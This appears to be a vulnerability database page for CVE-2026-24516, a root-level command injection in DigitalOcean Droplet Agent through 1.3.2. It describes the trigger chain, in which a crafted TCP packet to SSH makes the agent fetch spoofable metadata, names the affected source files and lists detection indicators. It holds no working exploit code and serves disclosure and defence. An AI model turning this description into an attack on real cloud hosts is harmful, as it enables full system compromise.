cbcvebase.
CVE-2026-24516
published 2026-03-23

CVE-2026-24516: A command injection vulnerability exists in DigitalOcean Droplet Agent through 1.3.2. The troubleshooting actioner component…

PriorityP268high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
EPSS
2.50%
82.7th percentile
A command injection vulnerability exists in DigitalOcean Droplet Agent through 1.3.2. The troubleshooting actioner component (internal/troubleshooting/actioner/actioner.go) processes metadata from the metadata service endpoint and executes commands specified in the TroubleshootingAgent.Requesting array without adequate input validation. While the code validates that artifacts exist in the validInvestigationArtifacts map, it fails to sanitize the actual command content after the "command:" prefix. This allows an attacker who can control metadata responses to inject and execute arbitrary OS commands with root privileges. The attack is triggered by sending a TCP packet with specific sequence numbers to the SSH port, which causes the agent to fetch metadata from http://169.254.169.254/metadata/v1.json. The vulnerability affects the command execution flow in internal/troubleshooting/actioner/actioner.go (insufficient validation), internal/troubleshooting/command/exec.go (direct exec.CommandContext call), and internal/troubleshooting/command/command.go (command parsing without sanitization). This can lead to complete system compromise, data exfiltration, privilege escalation, and potential lateral movement across cloud infrastructure.

Affected

1 ranges
VendorProductVersion rangeFixed in
github.comdigitalocean_droplet-agent0 – 0.0.0-20260107162243-1101ffcb5672

Detection & IOCsextracted from sources · hover to see the quote

pathinternal/troubleshooting/actioner/actioner.go
pathinternal/troubleshooting/command/exec.go
pathinternal/troubleshooting/command/command.go
  • Monitor for TCP packets with anomalous/specific sequence numbers sent to the SSH port (22) targeting Droplet Agent — this is the trigger mechanism for the exploit chain.
  • Alert on outbound HTTP requests from the droplet-agent process to the IMDS endpoint http://169.254.169.254/metadata/v1.json, especially when correlated with unusual SSH port activity.
  • Detect child processes spawned by droplet-agent (or its troubleshooting component) via exec.CommandContext — unexpected OS commands executed as root from this parent process indicate exploitation.
  • Audit validInvestigationArtifacts map entries at runtime; exploitation relies on passing artifact validation while smuggling malicious command content — look for artifact names that pass validation but carry injected shell metacharacters in the command field.
  • ·The vulnerability only affects DigitalOcean Droplet Agent versions through 1.3.2; verify the installed version before applying detections.
  • ·Exploitation requires the attacker to control metadata service responses (i.e., SSRF or network-level MITM of the link-local IMDS at 169.254.169.254); the attack surface is limited to environments where the metadata endpoint can be spoofed or manipulated.
  • ·No fix had been added as of March 26, 2026 per the GoLang advisory; detections and mitigations (e.g., blocking unsolicited IMDS access from the agent) should remain in place until a patched version is available.
Stop checking back — get the weekly exploitation signal.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.